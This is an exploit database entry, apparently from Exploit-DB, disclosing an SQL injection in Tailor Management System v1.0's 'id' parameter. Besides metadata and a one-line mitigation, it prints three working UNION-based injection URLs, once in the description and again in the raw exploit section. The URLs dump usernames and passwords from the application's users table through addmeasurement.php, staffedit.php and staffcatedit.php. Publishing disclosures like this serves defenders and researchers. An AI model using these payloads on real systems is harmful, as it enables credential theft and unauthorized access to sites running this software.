Tailor Management System - 'id' SQL Injection

vendor:

Tailor Management System

by:

mosaaed

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Tailor Management System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2020

Tailor Management System – ‘id’ SQL Injection

The Tailor Management System is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by manipulating the 'id' parameter in the URL. For example, an attacker can send the following malicious requests to the application: http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -, http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -, http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -